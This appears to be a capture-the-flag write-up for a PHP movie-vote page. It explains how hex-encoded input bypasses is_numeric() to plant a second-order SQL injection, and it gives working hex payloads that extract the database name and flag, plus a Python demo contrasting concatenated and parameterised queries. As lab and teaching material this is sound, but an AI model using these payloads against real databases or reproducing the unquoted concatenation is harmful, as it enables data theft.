Update:
vote
```php
<?php
include 'db.php';
session_start();
if (!isset($_SESSION['login'])) {
    $_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
}
$login = $_SESSION['login'];
if (isset($_POST['submit'])) {
    // The only gate on id is is_numeric(); on PHP 5 it also accepts "0x..." hex strings.
    if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))
        die('please select ...');
    $id = $_POST['id'];
    $vote = (int)$_POST['vote'];
    if ($vote > 5 || $vote < 1)
        $vote = 1;
    // id is concatenated unquoted; MySQL stores a hex literal in a string column as raw bytes.
    $q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
    $q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
    echo '<p><b>Thank you!</b> Results:</p>';
    echo '<table border="1">';
    echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
    while ($r = mysql_fetch_array($q)) {
        // Second-order injection: the stored id is read back and concatenated into SQL again.
        $arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
        echo '<tr><td>'.$arr[0].'</td>';
        $arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
        echo '<td>'.$arr[0].'</td><td>'.round($arr[1],2).'</td></tr>';
    }
    echo '</table>';
    echo '<br><a href="index.php">goBack</a><br>';
    exit;
}
?>
<html>
<head>
<title>Movie vote</title>
</head>
<body>
<p>Welcome, Movie vote</p>
<form action="index.php" method="POST">
<table border="1" cellspacing="5">
<tr>
<?php
$q = mysql_query('SELECT * FROM t_picture');
while ($r = mysql_fetch_array($q)) {
    echo '<td><img src="./images/'.$r['image'].'"><div align="center">'.$r['title'].'<br><input type="radio" name="id" value="'.$r['id'].'"></div></td>';
}
?>
</tr>
</table>
<p>Your vote:
<select name="vote">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select></p>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
```
Analysis
- Reading the whole thing through: the POST handler first INSERTs the vote into t_vote, then reads the voter's ids back out of t_vote and queries t_picture with each of them.
- The only attacker-controlled value that reaches a query unchanged is id (vote is cast to int, and login comes from the session).
- The only restriction on id is is_numeric($_POST['id']).
Solution
The is_numeric check on id can be bypassed with a 0x hexadecimal literal: on PHP 5, is_numeric() accepts hex strings (PHP 7 removed that, so this only works on PHP 5, which the mysql_* API already implies), and MySQL treats a hex literal inserted into a string column as the raw bytes, so our injection string is stored in t_vote as a plain string (the id column of t_vote must therefore be a string type; an integer column would store the literal as a number). When the page reads that id back out of t_vote and concatenates it unquoted into the SELECT on t_picture, the stored string is executed as SQL: a second-order injection.
Payload:
id='-1' union select database()&vote=1&submit=Submit
After hex encoding it becomes:
id=0x272d312720756e696f6e2073656c6563742064617461626173652829&vote=1&submit=Submit
Result: the database name is displayed in the Logo column of the results table.
The final payload that returns the flag is:
id='-111' union select group_concat(flag) from t_flag&vote=1&submit=Submit
Submitted as:
id=0x272d3131312720756e696f6e2073656c6563742067726f75705f636f6e63617428666c6167292066726f6d20745f666c6167&vote=1&submit=Submit
The fix is to cast id to an integer before using it and to bind parameters in every query, including the ones built from values read back out of the database.
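The encoding step and the second-order sink, as an added Python example that is not part of the original writeup. It approximates PHP 5 and PHP 7 is_numeric() with regular expressions, assumes MySQL's rule that a hex literal in string context is a binary string of those bytes, and uses an in-memory SQLite stand-in with a constructed t_picture/t_flag schema and a made-up flag value to contrast the concatenated lookup with a parameterised one. The 0x insertion itself is not reproduced in SQLite, which reads 0x... as an integer; only the decode that MySQL would perform is shown.

```python
import re
import sqlite3

# --- Step 1: the is_numeric() gate -------------------------------------------
# Approximation of PHP's is_numeric(): optional leading whitespace, optional
# sign, decimal digits with optional fraction and exponent. PHP 5 additionally
# accepts "0x" hexadecimal strings; PHP 7.0 removed that, so the bypass only
# works on PHP 5 (which the mysql_* API in the challenge already implies).
_DECIMAL = re.compile(r"^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$")
_HEX = re.compile(r"^\s*0[xX][0-9a-fA-F]+$")


def php5_is_numeric(s: str) -> bool:
    return bool(_DECIMAL.match(s) or _HEX.match(s))


def php7_is_numeric(s: str) -> bool:
    return bool(_DECIMAL.match(s))


# --- Step 2: encode the payload as a MySQL hex literal -----------------------
def hex_literal(payload: str) -> str:
    """Return 0x<hex of the payload bytes>, exactly as sent in the id field."""
    return "0x" + payload.encode().hex()


def mysql_stored_string(literal: str) -> str:
    """What MySQL stores when a hex literal is inserted into a string column:
    in string context a hex literal is a binary string of those bytes."""
    assert literal[:2].lower() == "0x", "not a hex literal"
    return bytes.fromhex(literal[2:]).decode()


# --- Step 3: the second-order sink -------------------------------------------
def second_order_query(stored_id: str) -> str:
    """The query index.php builds from the id it reads back out of t_vote."""
    return "SELECT title FROM t_picture WHERE id = " + stored_id


def _demo_db() -> sqlite3.Connection:
    # Constructed stand-in for the challenge schema; the flag value is made up.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE t_picture (id INTEGER, title TEXT, image TEXT);
        INSERT INTO t_picture VALUES (1, 'Logo A', 'a.png'), (2, 'Logo B', 'b.png');
        CREATE TABLE t_flag (flag TEXT);
        INSERT INTO t_flag VALUES ('flag{constructed-example}');
    """)
    return con


def vulnerable_lookup(stored_id: str):
    """String concatenation, as on the page: the stored id runs as SQL."""
    con = _demo_db()
    try:
        row = con.execute(second_order_query(stored_id)).fetchone()
    finally:
        con.close()
    return row[0] if row else None


def hardened_lookup(stored_id: str):
    """Parameterised form: the stored id is compared as data, never parsed as SQL."""
    con = _demo_db()
    try:
        row = con.execute(
            "SELECT title FROM t_picture WHERE id = ?", (stored_id,)
        ).fetchone()
    finally:
        con.close()
    return row[0] if row else None


if __name__ == "__main__":
    for payload in ("'-1' union select database()",
                    "'-111' union select group_concat(flag) from t_flag"):
        lit = hex_literal(payload)
        print(f"is_numeric PHP5={php5_is_numeric(lit)} PHP7={php7_is_numeric(lit)}  id={lit}")
        print("  stored as :", mysql_stored_string(lit))
        print("  sink query:", second_order_query(mysql_stored_string(lit)))
    flag_payload = "'-111' union select group_concat(flag) from t_flag"
    print("concatenated :", vulnerable_lookup(flag_payload))
    print("parameterised:", hardened_lookup(flag_payload))
```

The database() payload from the page is only encoded here, not executed, because SQLite has no database() function; the group_concat payload runs in both engines, which is why the SQLite stand-in can show the flag coming back through the Logo column query while the parameterised version returns nothing.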